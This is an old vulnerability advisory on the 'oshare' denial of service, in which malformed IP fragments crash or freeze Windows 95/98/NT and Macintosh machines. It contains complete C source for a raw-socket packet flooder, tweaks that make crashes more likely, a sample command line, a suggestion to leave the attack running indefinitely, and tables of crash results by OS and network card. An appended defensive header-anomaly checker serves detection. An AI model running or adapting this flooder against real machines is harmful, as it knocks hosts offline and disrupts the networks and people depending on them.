COMMAND
kernel
SYSTEMS AFFECTED
Windows 9x, NT, Mac
PROBLEM
R00t Zer0 found the following. Windows 98 crashes when it receives a
packet whose IP header values have been altered slightly. (From here
on, a packet of this structure is called an "oshare packet".) A
Macintosh crashed from the "oshare packet" in the same way, too, but
that is not implemented by this program; it will be released soon.
When Windows 98 receives an "oshare packet" it blue-screens and then
either hangs or reboots at random. Once the blue screen appears, the
network can no longer be used. On the Macintosh a TCP/IP error is
raised and the network can no longer be used either (see below for a
small code modification).
/****************************************************************************/
/* [ oshare_1_gou ver 0.1 ]  -- Dressing up No.1 --                         */
/*                                                                          */
/* This program transmits the "oshare" packet which restarts or crashes a   */
/* machine. But, because it can't pass through the router, it can be        */
/* carried out only in the same segment.                                    */
/* "oshare packet" is (frag 39193:-4@65528+). If ihl and tot_len are        */
/* changed, it has already been tested that it becomes possible to kill     */
/* Mac, too.                                                                */
/* -----------------------------------------                                */
/* Written by R00t Zer0                                                     */
/* E-Mail  : defcon0@ugtop.com                                              */
/* Web URL : http://www.ugtop.com/defcon0/index.htm                         */
/****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/in_systm.h>
#include <arpa/inet.h>

u_short in_cksum( u_short *, int );
int     send_oshare_packet( int, u_long );

/* Standard one's-complement Internet checksum over len bytes. */
u_short
in_cksum( u_short *addr, int len )
{
    int     nleft = len;
    u_short *w = addr;
    int     sum = 0;
    u_short answer = 0;

    while( nleft > 1 )
    {
        sum += *w++;
        nleft -= 2;
    }
    if( nleft == 1 )
    {
        *( u_char *)( &answer ) = *( u_char *)w;
        sum += answer;
    }
    sum = ( sum >> 16 ) + ( sum & 0xffff );
    sum += ( sum >> 16 );
    answer = ~sum;
    return( answer );
}

/* Builds one "oshare packet": the header claims 44 bytes (ihl 11,
   tot_len 44) while only 40 bytes are actually sent. */
int
send_oshare_packet( int sock_send, u_long dst_addr )
{
    char *packet;
    int send_status;
    struct iphdr *ip;
    struct sockaddr_in to;

    /* 44 bytes are allocated so the checksum below, which covers the
       44 bytes the header claims, never reads past the buffer. */
    packet = ( char *)malloc( 44 );
    ip = ( struct iphdr *)( packet );
    memset( packet, 0, 44 );
    ip->version = 4;
    ip->ihl = 11;
    ip->tos = 0x00;
    ip->tot_len = htons( 44 );
    ip->id = htons( 1999 );
    ip->frag_off = htons( 16383 );
    ip->ttl = 0xff;
    ip->protocol = IPPROTO_UDP;
    ip->saddr = htonl( inet_addr( "1.1.1.1" ) );
    ip->daddr = dst_addr;
    ip->check = in_cksum( ( u_short *)ip, 44 );
    memset( &to, 0, sizeof( to ) );
    to.sin_family = AF_INET;
    to.sin_port = htons( 0x123 );
    to.sin_addr.s_addr = dst_addr;
    send_status = sendto( sock_send, packet, 40, 0,
                          ( struct sockaddr *)&to, sizeof( struct sockaddr ) );
    free( packet );
    return( send_status );
}

int
main( int argc, char *argv[] )
{
    int loop, loop2;
    int sock_send;
    u_long dst_addr;
    struct hostent *host;
    struct sockaddr_in addr;
    time_t t;

    if( argc != 3 )
    {
        printf( "Usage : %s <dst addr> <num(k)>\n", argv[0] );
        exit( -1 );
    }
    t = time( 0 );
    srand( ( u_int )t );
    memset( &addr, 0, sizeof( struct sockaddr_in ) );
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr( argv[1] );
    if( addr.sin_addr.s_addr == INADDR_NONE )
    {
        host = gethostbyname( argv[1] );
        if( host == NULL )
        {
            printf( "Unknown host %s.\n", argv[1] );
            exit( -1 );
        }
        addr.sin_family = host->h_addrtype;
        memcpy( ( caddr_t )&addr.sin_addr, host->h_addr, host->h_length );
    }
    memcpy( &dst_addr, ( char *)&addr.sin_addr.s_addr, 4 );
    /* Raw socket; the IP header supplied above is sent as-is. */
    if( ( sock_send = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1 )
    {
        perror( "Getting raw send socket" );
        exit( -1 );
    }
    printf( "\n\"Oshare Packet\" sending" );
    fflush( stdout );
    /* argv[2] is the count in thousands of packets. */
    for( loop = 0; loop < atoi( argv[2] ); loop++ )
    {
        for( loop2 = 0; loop2 < 1000; loop2++ )
            send_oshare_packet( sock_send, dst_addr );
        fprintf( stderr, "." );
        fflush( stdout );
    }
    printf( "\n\nDone.\n\n" );
    fflush( stdout );
    close( sock_send );
    exit( 0 );
}
And here's a little modification to the source. For example...
    ip->ihl = 22;
    ip->frag_off = htons( -16383 );
Compile, and send heaps of packets ('./oshare x.x.x.x 300' for
example) to a local Windows 98/NT box. It should freeze (literally)
while packets are travelling. It recovers after the 'attack' is
finished (shouldn't be a big problem to leave a process in the
background that will send packets forever). This was tested
against Windows 98 and Windows NT 4.0 (2 Workstations and 1 Server,
all with SP4 applied, no post-SP4 hotfixes). It will also affect
HP-UX (tested against 10.20), but you won't get more than a
"jumping mouse" effect. Load is higher, but the machine is functional.
If you can't make it work, the cause is thought to be one of these:
1) A difference in the version of the OS.
   It works with ja (Japanese Windows), and it may not work with en
   (English Windows).
2) Modification of the code.
   When it was rewritten as below, an acquaintance's machine crashed
   with only 100 packets. This modification makes the cause of the
   bug much more vague.
   In 'send_oshare_packet':
       ip->ihl = rand() % 16;
       ip->tot_len = rand() % 0xffff;
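A defender-side check for the header inconsistencies described above, added here as an example and not part of the original post or R00t Zer0's code: it parses a received IPv4 header and flags the fields the oshare packet and its variants abuse (a header length larger than the packet, a total length shorter than the header, a non-final fragment carrying no payload, a fragment that would end past 65535, and the reserved flag bit that the htons( -16383 ) variant sets). The sample bytes are constructed from the advisory's values as tcpdump showed them on the wire; the 10.0.0.2 destination is a placeholder.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
/* Anomaly bits returned by ip_header_anomalies(); 0 means the header is sane. */
enum {
    IP_OK              = 0,
    IP_IHL_TOO_SMALL   = 1u << 0, /* ihl < 5: header shorter than 20 bytes      */
    IP_IHL_OVERRUNS    = 1u << 1, /* ihl*4 exceeds the bytes actually received  */
    IP_TOTLEN_MISMATCH = 1u << 2, /* tot_len disagrees with bytes received      */
    IP_TOTLEN_LT_IHL   = 1u << 3, /* tot_len shorter than the header it claims  */
    IP_FRAG_OVERFLOW   = 1u << 4, /* offset*8 + payload would pass 65535        */
    IP_FRAG_MF_EMPTY   = 1u << 5, /* "more fragments" set but no payload        */
    IP_FRAG_RESERVED   = 1u << 6  /* reserved flag bit set                      */
};
static unsigned rd16(const uint8_t *p) { return ((unsigned)p[0] << 8) | p[1]; }

/* Check an IPv4 header against wire_len, the byte count actually received. */
unsigned ip_header_anomalies(const uint8_t *pkt, size_t wire_len)
{
    unsigned a = IP_OK;
    if (wire_len < 20)
        return IP_IHL_OVERRUNS;            /* cannot hold even a minimal header */
    unsigned ihl_bytes = (pkt[0] & 0x0f) * 4u;
    unsigned tot_len   = rd16(pkt + 2);
    unsigned frag      = rd16(pkt + 6);    /* flags (3 bits) + offset (13 bits) */
    unsigned off_bytes = (frag & 0x1fff) * 8u;
    unsigned payload   = tot_len > ihl_bytes ? tot_len - ihl_bytes : 0;
    if (ihl_bytes < 20)                  a |= IP_IHL_TOO_SMALL;
    if (ihl_bytes > wire_len)            a |= IP_IHL_OVERRUNS;
    if (tot_len != wire_len)             a |= IP_TOTLEN_MISMATCH;
    if (tot_len < ihl_bytes)             a |= IP_TOTLEN_LT_IHL;
    if (off_bytes + payload > 65535)     a |= IP_FRAG_OVERFLOW;
    if ((frag & 0x2000) && payload == 0) a |= IP_FRAG_MF_EMPTY;
    if (frag & 0x8000)                   a |= IP_FRAG_RESERVED;
    return a;
}

/* Constructed sample (not a capture): the advisory's packet as tcpdump showed
 * it, "frag ...:-4@65528+": ihl 11 (44-byte header) but only 40 bytes on the
 * wire, id 1999, MF set, offset 65528, UDP, from 1.1.1.1 to 10.0.0.2. */
size_t build_oshare_sample(uint8_t *buf)
{
    static const uint8_t hdr[20] = {
        0x4b, 0x00, 0x00, 0x28, 0x07, 0xcf, 0x3f, 0xff, 0xff, 0x11,
        0x00, 0x00, 0x01, 0x01, 0x01, 0x01, 0x0a, 0x00, 0x00, 0x02 };
    memset(buf, 0, 40);
    memcpy(buf, hdr, sizeof hdr);
    return 40;
}
```

Any non-zero result is worth logging with the source address; a host receiving these at the rates the advisory describes (1000 packets per burst) will show them as a sustained stream from one sender.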
More testing showed something you may find interesting. The
differences in behavior seem to be due to the type of network card
installed in the machine. Here is a VERY small list:
- win95 is broken and bluescreens all the time.
- win98 with the following network cards...
  * LinkSys ISA (ne2000 chipset): Spontaneous Reboot.
  * LinkSys PCI (ne2000): Blue Screen
  * 3c509 (ISA): Blue Screen
  * 3c590 (PCI): Some Blue Screens, others Hang
  * 3c905 (PCI): Hangs until packets stop
    coming, then complete wakeup.
Also, Fabio Bastiglia Oliva posted the following info. The table
below shows the results of the oshare tests that he made in his
network environment.
-----------------------------------
Effects:
S - Frozen until packet stop
F - Frozen
B - Blue Screen
R - Reboot
-----------------------------------
AtkSrc (Attack Source):
L - Linux
S - SunOS
-----------------------------------
Info:
F - Full Install
U1 - Up from Windows 3.xx
U2 - Up from Windows 95 (4.00.950)
U3 - Up from Windows 95 (4.00.1111)
C - Conseal PC Firewall Installed
-----------------------------------
Lang (Language):
E - English
P - Portuguese
-----------------------------------
Test Results:
+----------------------+------+--------+--------+----------+-----------+
| OS & Version | Vuln | Effect | AtkSrc | Info | Lang |
+----------------------+------+--------+--------+----------+-----------+
|Windows 95 4.00.950 | YES | F B | L S | F | E P |
| |------+--------+--------+----------+-----------+
| | YES | F B | L S | U1 | E P |
| |------+--------+--------+----------+-----------+
| | YES | F B S | L S | U1 C | E P |
+----------------------+------+--------+--------+----------+-----------+
|Windows 95 4.00.1111 | YES | F B | L S | F | E P |
| or |------+--------+--------+----------+-----------+
|Windows 95 950b | YES | F B | L S | U1 | E P |
| |------+--------+--------+----------+-----------+
| | YES | F B S | L S | U1 C | E P |
+----------------------+------+--------+--------+----------+-----------+
|Windows 98 4.10.1998 | YES | R | L S | F | E P |
| |------+--------+--------+----------+-----------+
| | YES | F R | L S | U2 | E P |
| |------+--------+--------+----------+-----------+
| | YES | F R | L S | U3 | E P |
| |------+--------+--------+----------+-----------+
| | YES | S | L S | F C | E P |
| |------+--------+--------+----------+-----------+
| | YES | S | L S | U2 C | E P |
| |------+--------+--------+----------+-----------+
| | YES | S | L S | U3 C | E P |
+----------------------+------+--------+--------+----------+-----------+
|Windows NT 4 SP4 | NO | --- | --- | F | E |
+----------------------+------+--------+--------+----------+-----------+
|Windows 2000 Beta | NO | --- | --- | F | E |
+----------------------+------+--------+--------+----------+-----------+
|Linux Slackware 2.0.36| NO | --- | --- | --- | --- |
+----------------------+------+--------+--------+----------+-----------+
Multiple acronyms in one cell mean that the test results are the same
for those sources, or that the test produced different/multiple
effects on the same system.
SOLUTION
Nothing yet. SP1 for Win98 should address that. As for NT,
there was only one post reporting to be vulnerable without any
confirmation.